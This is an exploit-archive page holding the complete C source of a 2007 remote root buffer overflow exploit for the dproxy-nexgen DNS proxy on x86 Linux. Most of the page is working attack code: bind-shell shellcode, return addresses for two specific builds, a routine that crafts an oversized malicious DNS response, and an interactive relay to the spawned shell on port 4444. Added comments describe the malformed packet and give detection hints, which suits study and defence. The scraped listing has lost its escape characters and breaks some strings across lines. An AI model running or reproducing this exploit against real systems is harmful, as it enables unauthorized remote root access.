
dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)

03 Apr 2007 00:00:00 | Reported by: Root | Type: seebug | Source: www.seebug.org

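Remote root buffer overflow exploit for dproxy-nexgen on x86 Linux. The code is free software under the GNU General Public License, version 2, and was tested on dproxy-nexgen (.tar.gz). It contains buffer overflow code that yields remote shell access: per the listing, the payload travels in one DNS datagram to UDP port 53 and the shell is then reached on TCP port 4444, so an unexpected listener on port 4444 on a host running dproxy is worth alerting on.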

Code

                                                /* dproxy-v1.c
 *
&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;2007&nbsp;by&nbsp;<[email protected]>
&nbsp;*
&nbsp;*&nbsp;dproxy-nexgen&nbsp;remote&nbsp;root&nbsp;exploit&nbsp;(x86-lnx)
&nbsp;*&nbsp;by&nbsp;mu-b&nbsp;-&nbsp;Mar&nbsp;2007
&nbsp;*
&nbsp;*&nbsp;-&nbsp;Tested&nbsp;on:&nbsp;dproxy-nexgen&nbsp;(.tar.gz)
&nbsp;*
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;free&nbsp;software;&nbsp;you&nbsp;can&nbsp;redistribute&nbsp;it&nbsp;and/or&nbsp;modify
&nbsp;*&nbsp;it&nbsp;under&nbsp;the&nbsp;terms&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;as&nbsp;published&nbsp;by
&nbsp;*&nbsp;the&nbsp;Free&nbsp;Software&nbsp;Foundation;&nbsp;version&nbsp;2&nbsp;of&nbsp;the&nbsp;License.
&nbsp;*
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;distributed&nbsp;in&nbsp;the&nbsp;hope&nbsp;that&nbsp;it&nbsp;will&nbsp;be&nbsp;useful,
&nbsp;*&nbsp;but&nbsp;WITHOUT&nbsp;ANY&nbsp;WARRANTY;&nbsp;without&nbsp;even&nbsp;the&nbsp;implied&nbsp;warranty&nbsp;of
&nbsp;*&nbsp;MERCHANTABILITY&nbsp;or&nbsp;FITNESS&nbsp;FOR&nbsp;A&nbsp;PARTICULAR&nbsp;PURPOSE.&nbsp;&nbsp;See&nbsp;the
&nbsp;*&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;for&nbsp;more&nbsp;details.
&nbsp;*
&nbsp;*&nbsp;http://www.digit-labs.org/&nbsp;--&nbsp;Digit-Labs&nbsp;2007!@$!
&nbsp;*/

#include&nbsp;<stdio.h>
#include&nbsp;<stdlib.h>
#include&nbsp;<string.h>
#include&nbsp;<unistd.h>
#include&nbsp;<netinet/in.h>
#include&nbsp;<netdb.h>

/* Size of the datagram buffer that main() allocates and sends in full. */
#define&nbsp;BUF_SIZE&nbsp;&nbsp;&nbsp;&nbsp;512
/* Fill byte (ASCII 'A') that zbuffami() uses for padding. */
#define&nbsp;NOP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x41

/* UDP destination port used by main() when it calls sock_send_udp(). */
#define&nbsp;DEF_PORT&nbsp;&nbsp;&nbsp;&nbsp;53
#define&nbsp;PORT_DNS&nbsp;&nbsp;&nbsp;&nbsp;DEF_PORT
/* TCP port main() connects to after sending. For defenders: an unexpected
 * listener on this port on a host running dproxy is the thing to alert on. */
#define&nbsp;PORT_SHELL&nbsp;&nbsp;4444

/*
 * Payload byte string, left exactly as it appears on the scraped page.
 * NOTE(review): the bytes 0x11 0x5c in the second row equal 4444 in network
 * byte order, which matches PORT_SHELL -- presumably the port the payload
 * binds; confirm before relying on it as an indicator.
 */
const&nbsp;u_char&nbsp;bndshell_lnx[]&nbsp;=
&nbsp;&nbsp;\"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96\"
&nbsp;&nbsp;\"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56\"
&nbsp;&nbsp;\"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1\"
&nbsp;&nbsp;\"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0\"
&nbsp;&nbsp;\"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53\"
&nbsp;&nbsp;\"x89xe1xcdx80\";

#define&nbsp;NUM_TARGETS&nbsp;2

/*
 * One entry per supported build. Field use, as seen in zbuffami() and main():
 *   name       - label for the build (not read anywhere in this listing)
 *   len        - number of bytes of the buffer that zbuffami() fills
 *   zshell_pos - offset in the buffer where zshell is copied
 *   zshell     - byte string copied into the buffer
 *   fp_pos     - offset where the four bytes of fp are stored, low byte first
 *   fp         - 32-bit value written at fp_pos; printed by main() as "fp"
 */
struct&nbsp;target_t
{
&nbsp;&nbsp;const&nbsp;u_char&nbsp;*name;
&nbsp;&nbsp;const&nbsp;int&nbsp;len;
&nbsp;&nbsp;const&nbsp;int&nbsp;zshell_pos;
&nbsp;&nbsp;const&nbsp;u_char&nbsp;*zshell;
&nbsp;&nbsp;const&nbsp;int&nbsp;fp_pos;
&nbsp;&nbsp;const&nbsp;u_long&nbsp;fp;
};

/*
 * Known builds. NUM_TARGETS (2) counts the two real rows; the trailing {0}
 * row is a terminator that the upper-bound check in main() excludes.
 * NOTE(review): both fp values are fixed addresses in the 0x0804xxxx range,
 * which presumably assumes a non-position-independent i386 binary; a build
 * with different options or with PIE/ASLR would not match these constants.
 * That only raises the bar -- the durable fix is bounds checking in the
 * service's DNS name handling.
 */
/*&nbsp;fp&nbsp;=&nbsp;objdump&nbsp;-D&nbsp;dproxy&nbsp;|&nbsp;grep&nbsp;\"ff&nbsp;e2\"&nbsp;*/
struct&nbsp;target_t&nbsp;targets[]&nbsp;=&nbsp;{
&nbsp;&nbsp;{\"dproxy-nexgen&nbsp;(tar.gz)\",
&nbsp;&nbsp;&nbsp;512,&nbsp;25,&nbsp;bndshell_lnx,&nbsp;284,&nbsp;0x08048cf9}
&nbsp;&nbsp;,
&nbsp;&nbsp;{\"dproxy-nexgen&nbsp;(tar.gz,&nbsp;Debian&nbsp;stable)\",
&nbsp;&nbsp;&nbsp;512,&nbsp;25,&nbsp;bndshell_lnx,&nbsp;281,&nbsp;0x08048cf8}
&nbsp;&nbsp;,
&nbsp;&nbsp;{0}
};

static&nbsp;int&nbsp;sock_send&nbsp;(int&nbsp;sock,&nbsp;u_char&nbsp;*&nbsp;src,&nbsp;int&nbsp;len);
static&nbsp;int&nbsp;sock_recv&nbsp;(int&nbsp;sock,&nbsp;u_char&nbsp;*&nbsp;dst,&nbsp;int&nbsp;len);
static&nbsp;void&nbsp;sock_send_udp&nbsp;(u_char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port,&nbsp;u_char&nbsp;*&nbsp;src,&nbsp;int&nbsp;len);
static&nbsp;int&nbsp;sockami&nbsp;(u_char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port);
static&nbsp;void&nbsp;shellami&nbsp;(int&nbsp;sock);
static&nbsp;void&nbsp;zbuffami&nbsp;(u_char&nbsp;*&nbsp;zbuf,&nbsp;struct&nbsp;target_t&nbsp;*trgt);

/*
 * Thin wrapper over send(2) with no flags.
 * Returns the send() result narrowed to int: the number of bytes accepted,
 * or -1 on error.
 */
static int
sock_send (int sock, u_char * src, int len)
{
  return (int) send (sock, src, len, 0);
}

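/*
 * Receive up to len bytes from sock into dst and NUL-terminate the data.
 *
 * dst must have room for len + 1 bytes: when recv() fills all len bytes the
 * terminator is written at dst[len]. The caller in this file passes
 * sizeof (buf) - 1 for that reason.
 *
 * Returns the recv() result: the byte count, 0 when the peer has closed the
 * connection, or -1 on error (dst is not written in that case).
 */
static int
sock_recv (int sock, u_char * dst, int len)
{
  int rbytes;

  rbytes = recv (sock, dst, len, 0);
  if (rbytes >= 0)
    dst[rbytes] = '\0';   /* terminator literal was garbled in the scraped copy */

  return (rbytes);
}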

/*
 * Resolve host, open a UDP socket and send len bytes from src to host:port
 * as one datagram. A socket() or gethostbyname() failure prints a perror()
 * message and exits with status -1. As in the original listing, the sendto()
 * result is not checked and the socket is not closed before returning.
 */
static void
sock_send_udp (u_char * host, int port, u_char * src, int len)
{
  struct sockaddr_in dest;
  struct hostent *entry;
  int fd;

  fflush (stdout);

  fd = socket (AF_INET, SOCK_DGRAM, 0);
  if (fd == -1)
    {
      perror ("socket()");
      exit (-1);
    }

  entry = gethostbyname ((const char *) host);
  if (entry == NULL)
    {
      perror ("gethostbyname()");
      exit (-1);
    }

  /* Zero first so the padding bytes of sockaddr_in are defined. */
  memset (&dest, 0, sizeof (dest));
  dest.sin_family = AF_INET;
  dest.sin_port = htons (port);
  memcpy ((char *) &dest.sin_addr, entry->h_addr, entry->h_length);

  sendto (fd, src, len, 0, (struct sockaddr *) &dest, sizeof (dest));
}

/*
 * Resolve host and open a TCP connection to host:port.
 * Returns the connected socket descriptor. Every failure is fatal and is
 * reported with perror(): socket() and gethostbyname() errors exit with
 * status -1, a connect() error exits with EXIT_FAILURE.
 */
static int
sockami (u_char * host, int port)
{
  struct sockaddr_in peer;
  struct hostent *entry;
  int fd;

  fflush (stdout);

  fd = socket (AF_INET, SOCK_STREAM, 0);
  if (fd == -1)
    {
      perror ("socket()");
      exit (-1);
    }

  entry = gethostbyname ((const char *) host);
  if (entry == NULL)
    {
      perror ("gethostbyname()");
      exit (-1);
    }

  /* Zero first so the padding bytes of sockaddr_in are defined. */
  memset (&peer, 0, sizeof (peer));
  peer.sin_family = AF_INET;
  peer.sin_port = htons (port);
  memcpy ((char *) &peer.sin_addr, entry->h_addr, entry->h_length);

  if (connect (fd, (struct sockaddr *) &peer, sizeof (peer)) == -1)
    {
      perror ("connect()");
      exit (EXIT_FAILURE);
    }

  return fd;
}

/*
 * Interactive relay over an already-connected socket: sends one fixed command
 * line, then loops forever copying socket data to stdout and stdin data to
 * the socket. Never returns; the process exits when sock_recv() reports a
 * closed connection or an error.
 */
static&nbsp;void
shellami&nbsp;(int&nbsp;sock)
{
&nbsp;&nbsp;int&nbsp;n;
&nbsp;&nbsp;fd_set&nbsp;rset;
&nbsp;&nbsp;u_char&nbsp;recvbuf[1024],&nbsp;*cmd&nbsp;=&nbsp;\"id;&nbsp;uname&nbsp;-a;&nbsp;uptime
\";

&nbsp;&nbsp;sock_send&nbsp;(sock,&nbsp;cmd,&nbsp;strlen&nbsp;(cmd));

&nbsp;&nbsp;while&nbsp;(1)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* The set is rebuilt on every pass because select() modifies it. */
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FD_ZERO&nbsp;(&rset);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FD_SET&nbsp;(sock,&nbsp;&rset);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FD_SET&nbsp;(STDIN_FILENO,&nbsp;&rset);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* NOTE(review): the select() result is not checked before rset is read. */
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;select&nbsp;(sock&nbsp;+&nbsp;1,&nbsp;&rset,&nbsp;NULL,&nbsp;NULL,&nbsp;NULL);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(FD_ISSET&nbsp;(sock,&nbsp;&rset))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* One byte is held back for the terminator sock_recv() appends. */
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;((n&nbsp;=&nbsp;sock_recv&nbsp;(sock,&nbsp;recvbuf,&nbsp;sizeof&nbsp;(recvbuf)&nbsp;-&nbsp;1))&nbsp;<=&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf&nbsp;(stderr,&nbsp;\"Connection&nbsp;closed&nbsp;by&nbsp;foreign&nbsp;host.
\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(EXIT_SUCCESS);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf&nbsp;(\"%s\",&nbsp;recvbuf);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(FD_ISSET&nbsp;(STDIN_FILENO,&nbsp;&rset))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;((n&nbsp;=&nbsp;read&nbsp;(STDIN_FILENO,&nbsp;recvbuf,&nbsp;sizeof&nbsp;(recvbuf)&nbsp;-&nbsp;1))&nbsp;>&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;recvbuf[n]&nbsp;=&nbsp;\'\';
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sock_send&nbsp;(sock,&nbsp;recvbuf,&nbsp;n);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
}

/*
 * Fill zbuf (which must hold at least trgt->len bytes) with one DNS response
 * message whose answer record carries an over-long name, then overlay
 * trgt->zshell at trgt->zshell_pos and the four bytes of trgt->fp at
 * trgt->fp_pos.
 *
 * What a receiving parser should reject, going by the bytes written below:
 *   - a response (QR bit set in flags 0x8180) that answers no question
 *     (question count 0, answer count 1);
 *   - label length octets of 0x7f (127), above the 63-octet label limit of
 *     RFC 1035;
 *   - a name of 2 * 128 + 4 = 260 octets, above the 255-octet name limit;
 *   - a class field that is not a defined DNS class.
 * Any copy of a decoded name into a fixed-size buffer has to be bounded by
 * the destination size, independent of the lengths claimed in the packet.
 */
static&nbsp;void
zbuffami&nbsp;(u_char&nbsp;*&nbsp;zbuf,&nbsp;struct&nbsp;target_t&nbsp;*trgt)
{
&nbsp;&nbsp;int&nbsp;i;
&nbsp;&nbsp;u_char&nbsp;*ptr;
&nbsp;&nbsp;
&nbsp;&nbsp;ptr&nbsp;=&nbsp;zbuf;
&nbsp;&nbsp;memset&nbsp;(ptr,&nbsp;NOP,&nbsp;trgt->len);

&nbsp;&nbsp;/* 12-byte DNS header. */
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x69;&nbsp;/*&nbsp;transaction&nbsp;id&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x69;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x81;&nbsp;/*&nbsp;flags&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x80;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;questions&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;answers&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x01;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;authority&nbsp;rr\'s&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;number&nbsp;of&nbsp;additional&nbsp;rr\'s&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;

&nbsp;&nbsp;/* Answer record. The owner name is a compression pointer to offset 0x18
&nbsp;&nbsp; * (24), which is where the record data written further down begins. */
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xc0;&nbsp;/*&nbsp;compressed&nbsp;name&nbsp;&ptr+18&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x18;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;type&nbsp;=&nbsp;PTR&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x0c;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x07;&nbsp;/*&nbsp;class&nbsp;=&nbsp;jmp&nbsp;short&nbsp;+0x07&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xeb;

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;&nbsp;/*&nbsp;ttl&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xff;

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x01;&nbsp;/*&nbsp;data&nbsp;length&nbsp;=&nbsp;488&nbsp;bytes&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0xe8;

&nbsp;&nbsp;/* Two labels, each a 0x7f length octet followed by 0x7f fill bytes. */
&nbsp;&nbsp;/*&nbsp;wire&nbsp;format&nbsp;name&nbsp;*/
&nbsp;&nbsp;for&nbsp;(i&nbsp;=&nbsp;0;&nbsp;i&nbsp;<&nbsp;2;&nbsp;i++,&nbsp;ptr&nbsp;+=&nbsp;0x7f)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x7f;
&nbsp;&nbsp;&nbsp;&nbsp;memset&nbsp;(ptr,&nbsp;NOP,&nbsp;0x7f);
&nbsp;&nbsp;}

&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x02;&nbsp;/*&nbsp;padding&nbsp;*/
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;NOP;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;NOP;
&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;0x00;&nbsp;/*&nbsp;terminate&nbsp;name&nbsp;*/
&nbsp;&nbsp;
&nbsp;&nbsp;/* The last two bytes of the trgt->len region are set to 0x2e ('.'). */
&nbsp;&nbsp;/*&nbsp;terminate&nbsp;buffer&nbsp;*/
&nbsp;&nbsp;ptr&nbsp;=&nbsp;zbuf&nbsp;+&nbsp;trgt->len&nbsp;-&nbsp;1;
&nbsp;&nbsp;*ptr--&nbsp;=&nbsp;0x2e;
&nbsp;&nbsp;*ptr&nbsp;&nbsp;&nbsp;=&nbsp;0x2e;

&nbsp;&nbsp;/* NOTE(review): strlen() on a byte array stops at the first zero byte. */
&nbsp;&nbsp;memcpy&nbsp;(zbuf&nbsp;+&nbsp;trgt->zshell_pos,&nbsp;trgt->zshell,&nbsp;strlen&nbsp;(trgt->zshell));

&nbsp;&nbsp;/* trgt->fp is stored least-significant byte first. */
&nbsp;&nbsp;zbuf[trgt->fp_pos]&nbsp;=&nbsp;(u_char)&nbsp;(trgt->fp&nbsp;&&nbsp;0x000000ff);
&nbsp;&nbsp;zbuf[trgt->fp_pos&nbsp;+&nbsp;1]&nbsp;=&nbsp;(u_char)&nbsp;((trgt->fp&nbsp;&&nbsp;0x0000ff00)&nbsp;>>&nbsp;8);
&nbsp;&nbsp;zbuf[trgt->fp_pos&nbsp;+&nbsp;2]&nbsp;=&nbsp;(u_char)&nbsp;((trgt->fp&nbsp;&&nbsp;0x00ff0000)&nbsp;>>&nbsp;16);
&nbsp;&nbsp;zbuf[trgt->fp_pos&nbsp;+&nbsp;3]&nbsp;=&nbsp;(u_char)&nbsp;((trgt->fp&nbsp;&&nbsp;0xff000000)&nbsp;>>&nbsp;24);
}

/*
 * Command-line driver taking <host> and a <target> index. Going by the calls
 * below: it builds the buffer for the chosen targets[] row, sends all
 * BUF_SIZE bytes as one UDP datagram to PORT_DNS, waits one second, then
 * opens a TCP connection to PORT_SHELL on the same host and hands it to
 * shellami().
 *
 * Detection view: on the wire this is a single 512-byte UDP datagram to port
 * 53, followed about a second later by a TCP connection to port 4444 from the
 * same source address.
 */
int
main&nbsp;(int&nbsp;argc,&nbsp;char&nbsp;**argv)
{
&nbsp;&nbsp;int&nbsp;sock;
&nbsp;&nbsp;u_char&nbsp;zbuf[BUF_SIZE];
&nbsp;&nbsp;struct&nbsp;target_t&nbsp;*trgt;

&nbsp;&nbsp;printf&nbsp;(\"dproxy-nexgen&nbsp;remote&nbsp;root&nbsp;exploit
\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"by:&nbsp;<[email protected]>
\"
	&nbsp;&nbsp;\"http://www.digit-labs.org/&nbsp;--&nbsp;Digit-Labs&nbsp;2007!@$!

\");

&nbsp;&nbsp;/* NOTE(review): a usage error is reported on stderr but exits with
&nbsp;&nbsp; * EXIT_SUCCESS. */
&nbsp;&nbsp;if&nbsp;(argc&nbsp;<=&nbsp;2)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf&nbsp;(stderr,&nbsp;\"Usage:&nbsp;%s&nbsp;<host>&nbsp;<target>
\",&nbsp;argv[0]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(EXIT_SUCCESS);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;/* NOTE(review): atoi() reports no errors and negative values are not
&nbsp;&nbsp; * rejected, so the index used below is only bounded from above. */
&nbsp;&nbsp;if&nbsp;(atoi&nbsp;(argv[2])&nbsp;>=&nbsp;NUM_TARGETS)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf&nbsp;(stderr,&nbsp;\"Only&nbsp;%d&nbsp;targets&nbsp;known!!
\",&nbsp;NUM_TARGETS);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;(EXIT_SUCCESS);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;trgt&nbsp;=&nbsp;&targets[atoi&nbsp;(argv[2])];
&nbsp;&nbsp;printf&nbsp;(\"+Attacking&nbsp;to&nbsp;%s...
\",&nbsp;argv[1]);

&nbsp;&nbsp;printf&nbsp;(\"fp:&nbsp;0x%x
\",&nbsp;(int)&nbsp;trgt->fp);
&nbsp;&nbsp;printf&nbsp;(\"buf&nbsp;len:&nbsp;%d
\",&nbsp;trgt->len);

&nbsp;&nbsp;printf&nbsp;(\"+Building&nbsp;buffer&nbsp;with&nbsp;shellcode...\");
&nbsp;&nbsp;memset&nbsp;(zbuf,&nbsp;0x00,&nbsp;sizeof&nbsp;(zbuf));
&nbsp;&nbsp;zbuffami&nbsp;(zbuf,&nbsp;trgt);
&nbsp;&nbsp;printf&nbsp;(\"&nbsp;&nbsp;done
\");

&nbsp;&nbsp;/* The whole BUF_SIZE buffer is sent, not just trgt->len bytes. */
&nbsp;&nbsp;printf&nbsp;(\"+Sending&nbsp;Payload...\");
&nbsp;&nbsp;sock_send_udp&nbsp;(argv[1],&nbsp;PORT_DNS,&nbsp;zbuf,&nbsp;BUF_SIZE);
&nbsp;&nbsp;printf&nbsp;(\"&nbsp;&nbsp;done
\");

&nbsp;&nbsp;printf&nbsp;(\"+Waiting&nbsp;for&nbsp;the&nbsp;shellcode&nbsp;to&nbsp;be&nbsp;executed...
\");
&nbsp;&nbsp;sleep&nbsp;(1);
&nbsp;&nbsp;sock&nbsp;=&nbsp;sockami&nbsp;(argv[1],&nbsp;PORT_SHELL);
&nbsp;&nbsp;printf&nbsp;(\"+Wh00t!

\");
&nbsp;&nbsp;shellami&nbsp;(sock);

&nbsp;&nbsp;return&nbsp;(EXIT_SUCCESS);
}

03 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1
16